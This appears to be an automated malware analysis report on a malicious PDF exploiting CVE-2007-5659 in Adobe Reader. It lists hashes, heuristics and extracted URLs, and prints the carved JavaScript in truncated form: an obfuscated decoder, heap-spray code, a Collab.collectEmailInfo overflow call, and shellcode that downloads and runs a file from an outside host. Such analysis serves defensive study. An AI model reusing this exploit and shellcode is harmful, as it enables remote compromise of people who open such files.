Malicious PDF — malware analysis report

Static analysis result for SHA-256 7b82be33f3b5c1b5…

MALICIOUS

PDF

17.9 KB
MD5: 3a1b760dc567dbd7b09168ff47983c5f SHA-1: 40a2c438e729af9409ef25ee7bf8cb25a0c1d9f1 SHA-256: 7b82be33f3b5c1b53e66ed1c3f15cd209e83541b7a5b04e0306066da66582fb3
258 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains JavaScript that exploits CVE-2007-5659 in Adobe Reader. This script is designed to download and execute a second-stage payload from the URL http://newsoff.net/3/getexe.php?spl=pdf_exp. The ML classifier strongly indicates maliciousness, and the exploit cluster confirms the presence of exploit code.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.InsiderSoftware.com/fontlist/1.0/ In PDF document text
    • http://newsoff.net/3/getexe.php?spl=pdf_expReferenced by PDF JavaScript
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In PDF document text
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0003_000.js
d3739237e0cf7fdf4330d79ac942a83749ad53b29de8b67603597ee12b5731e4		 pdf-javascript-stream PDF /JS object 3 at offset 0x1FB2 21641 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var keyXXXStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function decode64(input) {
   var output = "";
   var chr1, chr2, chr3;
   var enc1, enc2, enc3, enc4;
   var i = 0;
   input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
   do {
      enc1 = keyXXXStr.indexOf(input.charAt(i++));
      enc2 = keyXXXStr.indexOf(input.charAt(i++));
      enc3 = keyXXXStr.indexOf(input.charAt(i++));
      enc4 = keyXXXStr.indexOf(input.charAt(i++));
      chr1 = (enc1 << 2) | (enc2 >> 4);
      chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
      chr3 = ((enc3 & 3) << 6) | enc4;
      output = output + String.fromCharCode(chr1);
      if (enc3 != 64) {
         output = output + String.fromCharCode(chr2);
      }
      if (enc4 != 64) {
         output = output + String.fromCharCode(chr3);
      }
   } while (i < input.length);
   return output;
}
var aasd = decode64("DQogdmFyIFgwV2IzZWRlcTlvID0gbmV3IEFycmF5KCk7DQogdmFyIGFQNEJocTVkQ29jOw0KIHZhciBsYXZlID0gZXZhbDsNCiAgbGF2ZSh1bmVzY2FwZSgiJTIwJTIwJTIwJTY2JTc1JTZlJTYzJTc0JTY5JTZmJTZlJTIwJTY4JTMzJTZmJTM4JTZmJTczJTUxJTQ4JTM5JTQ4JTUyJTI4JTc5JTc0JTU0JTRhJTU3JTM4JTQxJTY2JTc2JTYyJTM1JTJjJTIwJTczJTZlJTZkJTcwJTczJTUwJTMyJTY3JTMzJTU4JTZhJTI5JTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTc3JTY4JTY5JTZjJTY1JTI4JTc5JTc0JTU0JTRhJTU3JTM4JTQxJTY2JTc2JTYyJTM1JTJlJTZjJTY1JTZlJTY3JTc0JTY4JTIwJTJhJTIwJTMyJTIwJTNjJTIwJTczJTZlJTZkJTcwJTczJTUwJTMyJTY3JTMzJTU4JTZhJTI5JTIwJTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTc5JTc0JTU0JTRhJTU3JTM4JTQxJTY2JTc2JTYyJTM1JTIwJTJiJTNkJTIwJTc5JTc0JTU0JTRhJTU3JTM4JTQxJTY2JTc2JTYyJTM1JTNiJTIwJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTIwJTIwJTIwJTc5JTc0JTU0JTRhJTU3JTM4JTQxJTY2JTc2JTYyJTM1JTIwJTNkJTIwJTc5JTc0JTU0JTRhJTU3JTM4JTQxJTY2JTc2JTYyJTM1JTJlJTczJTc1JTYyJTczJTc0JTcyJTY5JTZlJTY3JTI4JTMwJTJjJTIwJTczJTZlJTZkJTcwJTczJTUwJTMyJTY3JTMzJTU4JTZhJTIwJTJmJTIwJTMyJTI5JTNiJTIwJTIwJTIwJTIwJTIwJTcyJTY1JTc0JTc1JTcyJTZlJTIwJTc5JTc0JTU0JTRhJTU3JTM4JTQxJTY2JTc2JTYyJTM1JTNiJTIwJTIwJTIwJTdkJTIwJTIwIikpOyAgbGF2ZSh1bmVzY2FwZSgiJTIwJTIwJTIwJTIwJTY2JTc1JTZlJTYzJTc0JTY5JTZmJTZlJTIwJTZkJTY1JTU5JTZhJTM1JTcwJTczJTRkJTQ3JTU3JTQ3JTI4JTUwJTcxJTZkJTcxJTMxJTUzJTZkJTYzJTU3JTZiJTUwJTI5JTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTY5JTY2JTI4JTUwJTcxJTZkJTcxJTMxJTUzJTZkJTYzJTU3JTZiJTUwJTIwJTNkJTNkJTIwJTMwJTI5JTIwJTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTRlJTVhJTQ4JTY5JTYyJTc5JTZiJTM5JTY5JTYyJTZkJTIwJTNkJTIwJTMwJTc4JTMwJTYzJTMwJTYzJTMwJTYzJTMwJTYzJTNiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTRmJTRjJTcyJTM2JTQ1JTQ1JTRkJTZiJTU1JTM3JTYxJTIwJTNkJTIwJTIwJTc1JTZlJTY1JTczJTYzJTYxJTcwJTY1JTI4JTIyJTI1JTc1JTQzJTMwJTMzJTMzJTI1JTc1JTM4JTQyJTM2JTM0JTI1JTc1JTMzJTMwJTM0JTMwJTI1JTc1JTMwJTQzJTM3JTM4JTI1JTc1JTM0JTMwJTM4JTQyJTI1JTc1JTM4JTQyJTMwJTQzJTI1JTc1JTMxJTQzJTM3JTMwJTI1JTc1JTM4JTQyJTQxJTQ0JTI1JTc1JTMwJTM4JTM1JTM4JTI1JTc1JTMwJTM5JTQ1JTQyJTI1JTc1JTM0JTMwJTM4JTQyJTI1JTc1JTM4JTQ0JTMzJTM0JTI1JTc1JTM3JTQzJTM0JTMwJTI1JTc1JTM1JTM4JTM4JTQyJTI1JTc1JTM2JTQxJTMzJTQzJTI1JTc1JTM1JTQxJTM0JTM0JTI1JTc1JTQ1JTMyJTQ0JTMxJTI1JTc1JTQ1JTMyJTMyJTQyJTI1JTc1JTQ1JTQzJTM4JTQyJTI1JTc1JTM0JTQ2JTQ1JTQyJTI1JTc1JTM1JTMyJTM1JTQxJTI1JTc1JTQ1JTQxJTM4JTMzJTI1JTc1JTM4JTM5JTM1JTM2JTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTM1JTM3JTM1JTM2JTI1JTc1JTM3JTMzJTM4JTQyJTI1JTc1JTM4JTQyJTMzJTQzJTI1JTc1JTMzJTMzJTM3JTM0JTI1JTc1JTMwJTMzJTM3JTM4JTI1JTc1JTM1JTM2JTQ2JTMzJTI1JTc1JTM3JTM2JTM4JTQyJTI1JTc1JTMwJTMzJTMyJTMwJTI1JTc1JTMzJTMzJTQ2JTMzJTI1JTc1JTM0JTM5JTQzJTM5JTI1JTc1JTM0JTMxJTM1JTMwJTI1JTc1JTMzJTMzJTQxJTQ0JTI1JTc1JTMzJTM2JTQ2JTQ2JTI1JTc1JTQyJTQ1JTMwJTQ2JTI1JTc1JTMwJTMzJTMxJTM0JTI1JTc1JTQ2JTMyJTMzJTM4JTI1JTc1JTMwJTM4JTM3JTM0JTI1JTc1JTQzJTQ2JTQzJTMxJTI1JTc1JTMwJTMzJTMwJTQ0JTI1JTc1JTM0JTMwJTQ2JTQxJTI1JTc1JTQ1JTQ2JTQ1JTQyJTI1JTc1JTMzJTQyJTM1JTM4JTI1JTc1JTM3JTM1JTQ2JTM4JTI1JTc1JTM1JTQ1JTQ1JTM1JTI1JTc1JTM0JTM2JTM4JTQyJTI1JTc1JTMwJTMzJTMyJTM0JTI1JTc1JTM2JTM2JTQzJTMzJTI1JTc1JTMwJTQzJTM4JTQyJTI1JTc1JTM4JTQyJTM0JTM4JTI1JTc1JTMxJTQzJTM1JTM2JTI1JTc1JTQ0JTMzJTMwJTMzJTI1JTc1JTMwJTM0JTM4JTQyJTI1JTc1JTMwJTMzJTM4JTQxJTI1JTc1JTM1JTQ2JTQzJTMzJTI1JTc1JTM1JTMwJTM1JTQ1JTI1JTc1JTM4JTQ0JTQzJTMzJTI1JTc1JTMwJTM4JTM3JTQ0JTI1JTc1JTM1JTMyJTM1JTM3JTI1JTc1JTMzJTMzJTQ
... (truncated)
generic_stage_recovery_000.js
dd4626e332eef2ad4ca0a96c24445033789028b7b787b4606c035c7b7ac3b623		 deobfuscated-js generic stage recovery percent-decode from JavaScript object 3 at offset 0x1FB2 5324 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var X0Wb3edeq9o = new Array();
 var aP4Bhq5dCoc;
 var lave = eval;
  lave(unescape("   function h3o8osQH9HR(ytTJW8Afvb5, snmpsP2g3Xj)   {     while(ytTJW8Afvb5.length * 2 < snmpsP2g3Xj)     {       ytTJW8Afvb5 += ytTJW8Afvb5;     }     ytTJW8Afvb5 = ytTJW8Afvb5.substring(0, snmpsP2g3Xj / 2);     return ytTJW8Afvb5;   }  "));  lave(unescape("    function meYj5psMGWG(Pqmq1SmcWkP)   {     if(Pqmq1SmcWkP == 0)     {       var NZHibyk9ibm = 0x0c0c0c0c;       var OLr6EEMkU7a =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6E2F%u7765%u6F73%u6666%u6E2E%u7465%u332F%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");     }     else if(Pqmq1SmcWkP == 1)     {       NZHibyk9ibm = 0x30303030;       var OLr6EEMkU7a =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6E2F%u7765%u6F73%u6666%u6E2E%u7465%u332F%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");     }     else if(Pqmq1SmcWkP == 2)     {       var OLr6EEMkU7a =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6E2F%u7765%u6F73%u6666%u6E2E%u7465%u332F%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");     }     var vwbjjDFTdY4 = 0x400000;     var XGft2nbdasz = OLr6EEMkU7a.length * 2;     var snmpsP2g3Xj = vwbjjDFTdY4 - (XGft2nbdasz + 0x38);     var ytTJW8Afvb5 = unescape("%u9090%u9090");     ytTJW8Afvb5 = h3o8osQH9HR(ytTJW8Afvb5, snmpsP2g3Xj);     var IyDfKy0QZQN = (NZHibyk9ibm - 0x400000) / vwbjjDFTdY4;     for(var Q07NPa1yevF = 0; Q07NPa1yevF < IyDfKy0QZQN; Q07NPa1yevF++)     {       X0Wb3edeq9o[Q07NPa1yevF] = ytTJW8Afvb5 + OLr6EEMkU7a;     }   }  "));  lave(unescape("   function GpH7RugJu9I()   {     var coc7x4fOQqY = 0;     var YDy9EwmAC61 = app.viewerVersion.toString();     app.clearTimeOut(aP4Bhq5dCoc);     if((YDy9EwmAC61 >= 8 && YDy9EwmAC61 < 8.102) || YDy9EwmAC61 < 7.1)     {       meYj5psMGWG(0);       var jCROtlI35Pq = unescape("%u0c0c%u0c0c");       while(jCROtlI35Pq.length < 44952) jCROtlI35Pq += jCROtlI35Pq;       var mVokBCB2liF = this;       var FqTgdesjeMw = Collab;       mVokBCB2liF["collabStore"] = FqTgdesjeMw["collectEmailInfo"](       {         subj : "", ms
... (truncated)
generic_stage_recovery_001.js
642021c1a768a5d83f7aac92785bfd9b987cb16c03cd146a1bc2b14ef139805f		 deobfuscated-js generic stage recovery percent-decode -> percent-decode from JavaScript object 3 at offset 0x1FB2 5320 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var X0Wb3edeq9o = new Array();
 var aP4Bhq5dCoc;
 var lave = eval;
  lave(unescape("   function h3o8osQH9HR(ytTJW8Afvb5, snmpsP2g3Xj)   {     while(ytTJW8Afvb5.length * 2 < snmpsP2g3Xj)     {       ytTJW8Afvb5 += ytTJW8Afvb5;     }     ytTJW8Afvb5 = ytTJW8Afvb5.substring(0, snmpsP2g3Xj / 2);     return ytTJW8Afvb5;   }  "));  lave(unescape("    function meYj5psMGWG(Pqmq1SmcWkP)   {     if(Pqmq1SmcWkP == 0)     {       var NZHibyk9ibm = 0x0c0c0c0c;       var OLr6EEMkU7a =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6E2F%u7765%u6F73%u6666%u6E2E%u7465%u332F%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");     }     else if(Pqmq1SmcWkP == 1)     {       NZHibyk9ibm = 0x30303030;       var OLr6EEMkU7a =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6E2F%u7765%u6F73%u6666%u6E2E%u7465%u332F%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");     }     else if(Pqmq1SmcWkP == 2)     {       var OLr6EEMkU7a =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6E2F%u7765%u6F73%u6666%u6E2E%u7465%u332F%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");     }     var vwbjjDFTdY4 = 0x400000;     var XGft2nbdasz = OLr6EEMkU7a.length * 2;     var snmpsP2g3Xj = vwbjjDFTdY4 - (XGft2nbdasz + 0x38);     var ytTJW8Afvb5 = unescape("%u9090%u9090");     ytTJW8Afvb5 = h3o8osQH9HR(ytTJW8Afvb5, snmpsP2g3Xj);     var IyDfKy0QZQN = (NZHibyk9ibm - 0x400000) / vwbjjDFTdY4;     for(var Q07NPa1yevF = 0; Q07NPa1yevF < IyDfKy0QZQN; Q07NPa1yevF++)     {       X0Wb3edeq9o[Q07NPa1yevF] = ytTJW8Afvb5 + OLr6EEMkU7a;     }   }  "));  lave(unescape("   function GpH7RugJu9I()   {     var coc7x4fOQqY = 0;     var YDy9EwmAC61 = app.viewerVersion.toString();     app.clearTimeOut(aP4Bhq5dCoc);     if((YDy9EwmAC61 >= 8 && YDy9EwmAC61 < 8.102) || YDy9EwmAC61 < 7.1)     {       meYj5psMGWG(0);       var jCROtlI35Pq = unescape("%u0c0c%u0c0c");       while(jCROtlI35Pq.length < 44952) jCROtlI35Pq += jCROtlI35Pq;       var mVokBCB2liF = this;       var FqTgdesjeMw = Collab;       mVokBCB2liF["collabStore"] = FqTgdesjeMw["collectEmailInfo"](       {         subj : "", ms
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.